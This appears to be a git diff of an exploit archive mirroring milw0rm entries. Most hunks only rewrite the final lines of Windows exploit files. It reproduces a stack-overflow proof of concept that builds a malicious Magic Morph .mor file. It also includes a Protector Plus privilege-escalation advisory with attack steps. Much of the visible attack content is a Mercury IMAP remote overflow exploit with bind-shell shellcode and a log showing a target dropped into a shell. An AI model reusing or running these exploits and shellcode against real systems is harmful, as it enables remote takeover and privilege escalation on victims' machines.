0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, + 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, + 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, + 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, + 0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, + 0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, + 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, + }; + + uint8_t hexfileP2[] = { + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, + 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, + 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + }; + + uint8_t hexfileP3[] = { + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, + 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, + 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, + 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, + 0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, + 0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +} ; + FILE *f; + f = fopen(fname ,"wb"); + F *Gf; + Gf = (F*)malloc(sizeof(F)); + Gf->a = 0x43; + Gf->b = 0x3A; + Gf->c = 0x5C; + uint8_t B[100]; + memcpy(B, Gf, sizeof(Gf)); + fwrite(B, sizeof(uint8_t), 3, f); + fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f); + fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f); + fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f); + fclose(f); + } + void args(int argc, char *argv[]) + { + int file; + int a; + if(a) + while((a = getopt(argc, argv, "f")) != EOF) { + switch(a) { + case 'f': + file = (int)optarg; + break; + default: + exit(-1); + } + } + } + void Usage (char *Name) + { system("CLS"); + printf("*********************************************************************\n"); + fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n"); + printf("The usage is:\n"); + + fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n"); + } + void Menu() + { fprintf(stderr, + "\n" + "\t-f FILE.mor\n" + "*********************************************************************" + "\n"); + } + + int main(int32_t argc , char *argv[]) + { if(argc < 2) { + Usage(argv[0]); + Menu(); + + exit(-1); + } + char b[100]; + strcpy(b, argv[2]); + strcat(b, ".mor"); + buildFile(b); + printf("File DONE !\n"); + return 0; + } + //END Algorithm + +/ 
milw0rm.com [2009-09-14] diff --git a/platforms/windows/local/966.c b/platforms/windows/local/966.c index 785a3dd5f..738fa64ac 100755 --- a/platforms/windows/local/966.c +++ b/platforms/windows/local/966.c @@ -80,6 +80,6 @@ int main() } printf("View Lock Password: %s",bilgi_oku(4,3)); return 0; -} - -// milw0rm.com [2005-04-28] +} + +// milw0rm.com [2005-04-28] diff --git a/platforms/windows/local/9680.txt b/platforms/windows/local/9680.txt index 52cd0dfc0..e00898bd0 100755 --- a/platforms/windows/local/9680.txt +++ b/platforms/windows/local/9680.txt 
@@ -1,69 +1,69 @@ -ShineShadow Security Report 15092009-09 - -TITLE - -Local privilege escalation vulnerability in Protector Plus antivirus software - -BACKGROUND - -Protector Plus range of antivirus products are known the world over for -their efficiency and reliability. Protector Plus Antivirus Software is -available for Windows Vista, Windows XP, Windows Me, Windows 2000, -Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector -Plus Antivirus Software is the ideal antivirus protection for your -computer against all types of malware like viruses, trojans, worms and -spyware. - --- www.pspl.com - -VULNERABLE PRODUCTS - -Protector Plus 2009 for Windows Desktops (8.0.E03) -Protector Plus 2009 for Windows Server (8.0.E03) -Protector Plus Professional (9.1.001) - -Previous versions may also be affected - -DETAILS - -Protector Plus installs the own program files with insecure permissions -(Everyone - Full Control). Local attacker (unprivileged user) can -replace some files (for example, executable files of Protector services) -by malicious file and execute arbitary code with SYSTEM privileges. This -is local privilege escalation vulnerability. - -For example, the following attack scenario could be used: -1. An attacker (unprivileged user) renames one of the Protector program -files (below, the FILE). For example, the FILE could be - PPAVMON.exe -(Protector Plus Anti-virus Monitor Service). -2. An attacker copies his malicious executable file (with same name as -the old filename of the FILE - PPAVMON.exe) to Protector folder. -3. Restart the system. -After restart attackers malicious file will be executed with SYSTEM -privileges. - -EXPLOITATION - -This is local privilege escalation vulnerability. An attacker must have -valid logon credentials to a system where vulnerable software is -installed. - -WORKAROUND - -No workarounds - -DISCLOSURE TIMELINE - -31/08/2009 Initial vendor notification. Secure contacts requested. 
-01/09/2009 Vendor response -03/09/2009 Vulnerability details sent. Confirmation requested. – no reply -09/09/2009 Vulnerability details sent. Confirmation requested. – no reply -11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply -15/09/2009 Advisory released - -CREDITS - -Maxim A. Kulakov (aka ShineShadow) -ss_contacts[at]hotmail.com - -# milw0rm.com [2009-09-15] +ShineShadow Security Report 15092009-09 + +TITLE + +Local privilege escalation vulnerability in Protector Plus antivirus software + +BACKGROUND + +Protector Plus range of antivirus products are known the world over for +their efficiency and reliability. Protector Plus Antivirus Software is +available for Windows Vista, Windows XP, Windows Me, Windows 2000, +Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector +Plus Antivirus Software is the ideal antivirus protection for your +computer against all types of malware like viruses, trojans, worms and +spyware. + +-- www.pspl.com + +VULNERABLE PRODUCTS + +Protector Plus 2009 for Windows Desktops (8.0.E03) +Protector Plus 2009 for Windows Server (8.0.E03) +Protector Plus Professional (9.1.001) + +Previous versions may also be affected + +DETAILS + +Protector Plus installs the own program files with insecure permissions +(Everyone - Full Control). Local attacker (unprivileged user) can +replace some files (for example, executable files of Protector services) +by malicious file and execute arbitary code with SYSTEM privileges. This +is local privilege escalation vulnerability. + +For example, the following attack scenario could be used: +1. An attacker (unprivileged user) renames one of the Protector program +files (below, the FILE). For example, the FILE could be - PPAVMON.exe +(Protector Plus Anti-virus Monitor Service). +2. An attacker copies his malicious executable file (with same name as +the old filename of the FILE - PPAVMON.exe) to Protector folder. +3. Restart the system. 
+After restart attackers malicious file will be executed with SYSTEM +privileges. + +EXPLOITATION + +This is local privilege escalation vulnerability. An attacker must have +valid logon credentials to a system where vulnerable software is +installed. + +WORKAROUND + +No workarounds + +DISCLOSURE TIMELINE + +31/08/2009 Initial vendor notification. Secure contacts requested. +01/09/2009 Vendor response +03/09/2009 Vulnerability details sent. Confirmation requested. – no reply +09/09/2009 Vulnerability details sent. Confirmation requested. – no reply +11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply +15/09/2009 Advisory released + +CREDITS + +Maxim A. Kulakov (aka ShineShadow) +ss_contacts[at]hotmail.com + +# milw0rm.com [2009-09-15] diff --git a/platforms/windows/local/9983.pl b/platforms/windows/local/9983.pl index b417aab11..843723d6f 100755 --- a/platforms/windows/local/9983.pl +++ b/platforms/windows/local/9983.pl @@ -1,4 +1,3 @@ - #!/usr/bin/perl #===================================== #Xion Audio Player(.m3u File) Local buffer Overflow PoC diff --git a/platforms/windows/remote/1026.cpp b/platforms/windows/remote/1026.cpp index de5efeffa..8b325d21a 100755 --- a/platforms/windows/remote/1026.cpp +++ b/platforms/windows/remote/1026.cpp @@ -268,6 +268,6 @@ int main(int argc, char* argv[]) WSACleanup(); return 0; -} - -// milw0rm.com [2005-06-02] +} + +// milw0rm.com [2005-06-02] diff --git a/platforms/windows/remote/1028.c b/platforms/windows/remote/1028.c index 4ef767d77..2d91d2b4b 100755 --- a/platforms/windows/remote/1028.c +++ b/platforms/windows/remote/1028.c @@ -152,6 +152,6 @@ main (int argc, char **argv) } lame_sploit(argv[1],argv[2],argv[3]); -} - -// milw0rm.com [2005-06-03] +} + +// milw0rm.com [2005-06-03] diff --git a/platforms/windows/remote/103.c b/platforms/windows/remote/103.c index a009e52da..a51e8b386 100755 --- a/platforms/windows/remote/103.c +++ b/platforms/windows/remote/103.c 
@@ -259,6 +259,6 @@ void main(int argc,char ** argv) /* -*/ - -// milw0rm.com [2003-09-20] +*/ + +// milw0rm.com [2003-09-20] diff --git a/platforms/windows/remote/1035.c b/platforms/windows/remote/1035.c index efa2f5d83..e041cd6db 100755 --- a/platforms/windows/remote/1035.c +++ b/platforms/windows/remote/1035.c @@ -285,6 +285,6 @@ char* alphaEncodeShellcode(char *shellcode, int size) strcat(encShellcode,buff); } return encShellcode; -} - -// milw0rm.com [2005-06-07] +} + +// milw0rm.com [2005-06-07] diff --git a/platforms/windows/remote/1066.cpp b/platforms/windows/remote/1066.cpp index 368084219..58d1c679e 100755 --- a/platforms/windows/remote/1066.cpp +++ b/platforms/windows/remote/1066.cpp @@ -126,6 +126,6 @@ printf("[+] close connection\n"); WSACleanup(); return; -} - -// milw0rm.com [2005-06-24] +} + +// milw0rm.com [2005-06-24] diff --git a/platforms/windows/remote/1075.c b/platforms/windows/remote/1075.c index 8360bc302..ec6bf2c2f 100755 --- a/platforms/windows/remote/1075.c +++ b/platforms/windows/remote/1075.c @@ -470,6 +470,6 @@ main (int argc, char **argv) return 0; -} - -// milw0rm.com [2005-06-29] +} + +// milw0rm.com [2005-06-29] diff --git a/platforms/windows/remote/1079.html b/platforms/windows/remote/1079.html index b7f0e6f69..27f29495f 100755 --- a/platforms/windows/remote/1079.html +++ b/platforms/windows/remote/1079.html @@ -135,6 +135,6 @@ for (i=0;i<750;i++) memory[i] = block + shellcode; Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > -Solution - http://www.frsirt.com/english/advisories/2005/0935 - -# milw0rm.com [2005-07-05] +Solution - http://www.frsirt.com/english/advisories/2005/0935 + +# milw0rm.com [2005-07-05] diff --git a/platforms/windows/remote/109.c b/platforms/windows/remote/109.c index c94eef4f8..61955433d 100755 --- a/platforms/windows/remote/109.c +++ b/platforms/windows/remote/109.c 
@@ -593,6 +593,6 @@ Sleep(60000); fclose(fp1); return 0; -} - -// milw0rm.com [2003-10-09] +} + +// milw0rm.com [2003-10-09] diff --git a/platforms/windows/remote/1096.txt b/platforms/windows/remote/1096.txt index 78342ab02..dc5c9128c 100755 --- a/platforms/windows/remote/1096.txt +++ b/platforms/windows/remote/1096.txt @@ -49,6 +49,6 @@ GET CREDIT
    Soroush Dalili from GSG

    -

    - -# milw0rm.com [2005-07-10] +

    + +# milw0rm.com [2005-07-10] diff --git a/platforms/windows/remote/1099.pl b/platforms/windows/remote/1099.pl index b7f2cffb5..fc0a99df2 100755 --- a/platforms/windows/remote/1099.pl +++ b/platforms/windows/remote/1099.pl @@ -113,6 +113,6 @@ close($sock); print "[+] Domain: $site\n"; print "[+] Path: $ARGV[2]\n"; print "[+] 0wned!\n"; -exit(); - -# milw0rm.com [2005-07-11] +exit(); + +# milw0rm.com [2005-07-11] diff --git a/platforms/windows/remote/1108.pl b/platforms/windows/remote/1108.pl index a459284f8..986765aaf 100755 --- a/platforms/windows/remote/1108.pl +++ b/platforms/windows/remote/1108.pl @@ -137,6 +137,6 @@ my $mw = MainWindow->new(-title => 'INFO',); )->pack; $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]); $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack; - MainLoop; - -# milw0rm.com [2005-07-15] + MainLoop; + +# milw0rm.com [2005-07-15] diff --git a/platforms/windows/remote/1115.pl b/platforms/windows/remote/1115.pl index d28247bc4..6bbf4b0aa 100755 --- a/platforms/windows/remote/1115.pl +++ b/platforms/windows/remote/1115.pl @@ -123,6 +123,6 @@ my $mw = MainWindow->new(-title => 'INFO',); )->pack; $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]); $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack; - MainLoop; - -# milw0rm.com [2005-07-21] + MainLoop; + +# milw0rm.com [2005-07-21] diff --git a/platforms/windows/remote/1118.c b/platforms/windows/remote/1118.c index 84e43fd21..8c33a21bc 100755 --- a/platforms/windows/remote/1118.c +++ b/platforms/windows/remote/1118.c @@ -277,6 +277,6 @@ int main(int argc, char *argv[]) { #endif return(0); -} - -// milw0rm.com [2005-07-25] +} + +// milw0rm.com [2005-07-25] diff --git a/platforms/windows/remote/1130.c b/platforms/windows/remote/1130.c index 976ae31b0..939b3aa3f 100755 --- a/platforms/windows/remote/1130.c +++ b/platforms/windows/remote/1130.c 
@@ -129,6 +129,6 @@ main ( int argc, char* argv[] ) } else exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ); -} - -// milw0rm.com [2005-08-03] +} + +// milw0rm.com [2005-08-03] diff --git a/platforms/windows/remote/1131.c b/platforms/windows/remote/1131.c index 5311ddeb8..e46e91bf1 100755 --- a/platforms/windows/remote/1131.c +++ b/platforms/windows/remote/1131.c @@ -160,6 +160,6 @@ main ( int argc, char* argv[] ) } else exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ); -} - -// milw0rm.com [2005-08-03] +} + +// milw0rm.com [2005-08-03] diff --git a/platforms/windows/remote/1132.c b/platforms/windows/remote/1132.c index 3ce8a8724..2e9f34086 100755 --- a/platforms/windows/remote/1132.c +++ b/platforms/windows/remote/1132.c @@ -1077,6 +1077,6 @@ main ( int argc, char* argv[] ) break; } } -} - -// milw0rm.com [2005-08-03] +} + +// milw0rm.com [2005-08-03] diff --git a/platforms/windows/remote/1147.pm b/platforms/windows/remote/1147.pm index 8391cee4b..74394e0d6 100755 --- a/platforms/windows/remote/1147.pm +++ b/platforms/windows/remote/1147.pm @@ -394,6 +394,6 @@ sub AgentSend { return $sock->Send(pack('N', 0x80000000 + length($data)) . $data); } -1; - -# milw0rm.com [2005-08-11] +1; + +# milw0rm.com [2005-08-11] diff --git a/platforms/windows/remote/1150.pm b/platforms/windows/remote/1150.pm index b47200dd3..c638f99e5 100755 --- a/platforms/windows/remote/1150.pm +++ b/platforms/windows/remote/1150.pm @@ -127,6 +127,6 @@ sub Exploit { return; } -1; - -# milw0rm.com [2005-08-12] +1; + +# milw0rm.com [2005-08-12] diff --git a/platforms/windows/remote/1152.pm b/platforms/windows/remote/1152.pm index c6165ade5..ee4f57b45 100755 --- a/platforms/windows/remote/1152.pm +++ b/platforms/windows/remote/1152.pm @@ -108,6 +108,6 @@ sub Exploit { return; } -1; - -# milw0rm.com [2005-08-12] +1; + +# milw0rm.com [2005-08-12] diff --git a/platforms/windows/remote/116.c b/platforms/windows/remote/116.c index 7ab3c492e..55a4f6733 100755 
--- a/platforms/windows/remote/116.c +++ b/platforms/windows/remote/116.c @@ -157,6 +157,6 @@ int main(int argc, char **argv) { printf("[-] Not connected! NIPrint probably not vulnerable!\n"); return 0; -} - -// milw0rm.com [2003-11-04] +} + +// milw0rm.com [2003-11-04] diff --git a/platforms/windows/remote/117.c b/platforms/windows/remote/117.c index 01591160b..2cdc74997 100755 --- a/platforms/windows/remote/117.c +++ b/platforms/windows/remote/117.c @@ -476,6 +476,6 @@ int main(int argc, char **argv) return 1; } - - -// milw0rm.com [2003-11-07] + + +// milw0rm.com [2003-11-07] diff --git a/platforms/windows/remote/1178.c b/platforms/windows/remote/1178.c index 1d44b0cdc..01fd074ab 100755 --- a/platforms/windows/remote/1178.c +++ b/platforms/windows/remote/1178.c @@ -162,6 +162,6 @@ int Conecta(char *Host, short puerto) } return Winsock; -} - -// milw0rm.com [2005-08-25] +} + +// milw0rm.com [2005-08-25] diff --git a/platforms/windows/remote/1179.c b/platforms/windows/remote/1179.c index c76e66d0a..3caadf599 100755 --- a/platforms/windows/remote/1179.c +++ b/platforms/windows/remote/1179.c @@ -440,6 +440,6 @@ main (int argc, char **argv) recv(sockfd, recvbuf, 4096, 0); return 0; -} - -// milw0rm.com [2005-08-25] +} + +// milw0rm.com [2005-08-25] diff --git a/platforms/windows/remote/1180.c b/platforms/windows/remote/1180.c index 7c758342f..dae97fa93 100755 --- a/platforms/windows/remote/1180.c +++ b/platforms/windows/remote/1180.c @@ -440,6 +440,6 @@ main (int argc, char **argv) recv(sockfd, recvbuf, 4096, 0); return 0; -} - -// milw0rm.com [2005-08-25] +} + +// milw0rm.com [2005-08-25] diff --git a/platforms/windows/remote/119.c b/platforms/windows/remote/119.c index 73f6580e6..43803716a 100755 --- a/platforms/windows/remote/119.c +++ b/platforms/windows/remote/119.c @@ -97,6 +97,6 @@ int main(void) FreeLibrary(hInstance); return 0; -} - -// milw0rm.com [2003-11-12] +} + +// milw0rm.com [2003-11-12] 
diff --git a/platforms/windows/remote/1190.c b/platforms/windows/remote/1190.c
index e9901aa54..18907f62a 100755
--- a/platforms/windows/remote/1190.c
+++ b/platforms/windows/remote/1190.c
@@ -399,6 +399,6 @@ int check(char *host,unsigned short tport, unsigned int *sp){
 closesocket(sockTCP);
 return UNKNOWN;
 }
-}
-
-// milw0rm.com [2005-08-31]
+}
+
+// milw0rm.com [2005-08-31]
diff --git a/platforms/windows/remote/1193.pl b/platforms/windows/remote/1193.pl
index 34857e854..2847dad09 100755
--- a/platforms/windows/remote/1193.pl
+++ b/platforms/windows/remote/1193.pl
@@ -74,6 +74,6 @@ print "[*] QUIT..\n";
 print "[+] MAIL SPAMWNED!\n\n";
 close $remote;
 print "press any key to exit..\n";
-$bla= [STDIN];
-
-# milw0rm.com [2005-09-02]
+$bla= [STDIN];
+
+# milw0rm.com [2005-09-02]
diff --git a/platforms/windows/remote/1201.pl b/platforms/windows/remote/1201.pl
index 14bd962f1..80eacfb23 100755
--- a/platforms/windows/remote/1201.pl
+++ b/platforms/windows/remote/1201.pl
@@ -98,6 +98,6 @@ print $remote "$chop\n";
 print "W00t.FTP Flawned!\n";
 print "..press any key to exit\n";
 $bla= ;
-close $remote;
-
-# milw0rm.com [2005-09-07]
+close $remote;
+
+# milw0rm.com [2005-09-07]
diff --git a/platforms/windows/remote/121.c b/platforms/windows/remote/121.c
index 45e2c1967..330188005 100755
--- a/platforms/windows/remote/121.c
+++ b/platforms/windows/remote/121.c
@@ -236,6 +236,6 @@ long gimmeip(char *hostname)
 }
 return ipaddr;
 }
-/*********************************************************************************/
-
-// milw0rm.com [2003-11-13]
+/*********************************************************************************/
+
+// milw0rm.com [2003-11-13]
diff --git a/platforms/windows/remote/1210.pm b/platforms/windows/remote/1210.pm
index c7d72b10b..ca3b79e45 100755
--- a/platforms/windows/remote/1210.pm
+++ b/platforms/windows/remote/1210.pm
@@ -151,6 +151,6 @@ sub Exploit
 $self->Handler($s);
 $s->Close();
 return;
-}
-
-# milw0rm.com [2005-09-11]
+}
+
+# milw0rm.com [2005-09-11]
diff --git a/platforms/windows/remote/1223.c b/platforms/windows/remote/1223.c
index baad56f58..2c0b484e3 100755
--- a/platforms/windows/remote/1223.c
+++ b/platforms/windows/remote/1223.c
@@ -1,309 +1,309 @@ -/* - Mercury imap4 server remote buffer overflow exploit - author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org - package : Mercury mail transport system 4.01a and prolly prior - workaround : upgrade to 4.01b version - advisory : not available right now - company address : www.pmail.com - timeline : - 15 Sep 2005 : vulnerability reported by securiteam mailing list - 20 Sep 2005 : IHS exploit released - exploit features : - 1) 5 working targets including win2k , winxp , win2k3 - 2) reliable metasploit shellcode - 3) autoconnect to shell - bad chars are : 0x20 0x0a - compiled with visual c++ 6 : cl mercury_imap.c - greeting to : - www.ihsteam.com the team , LorD and NT heya - www.ihsteam.net english version , - www.exploitdev.com Jamie and Ben the two good brothers also my brothers - www.metasploit.com when are you gonna release the newer version :P ? - www.class101.org class with his new laptop :> - www.milw0rm.com str0ke , I am sending it to you first dont doubt :d - www.c0d3r.org study time started :((( , pitty for the c0d3r ! - shout to actionspider - read these lines and try to understand ( I know you cant akhey ) that - an script kiddie (defacer) never ever could be compared to an exploit coder - try to grow , being grown up is not related to age -- with respects -/* -/* - -D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc - --------- mercury imap remote BOF exploit by c0d3r - -[+] target : windows 2003 server enterprise service pack 1 -[+] building login data -[+] building overflow string -[+] attacking host ihs -[+] packet size = 625 byte -[+] connected -[+] sending login info -[+] sending exploit string -[+] exploit sent successfully to ihs -[+] trying to get shell -[+] connecting to ihs on port 4444 -[+] target exploited successfully -[+] Dropping into shell - -Microsoft Windows [Version 5.2.3790] -(C) Copyright 1985-2003 Microsoft Corp. 
- -H:\MERCURY> - -*/ - -#include -#include -#include -#include -#pragma comment(lib, "ws2_32.lib") -#define NOP 0x90 -#define size 625 -// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1 - - -// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub -// bad chars : 0x00 0x0a 0x20 0x0d - -char shellcode[]= -"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92" -"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4" -"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0" -"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2" -"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13" -"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0" -"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0" -"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b" -"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb" -"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39" -"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68" -"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda" -"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53" -"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72" -"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c" -"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b" 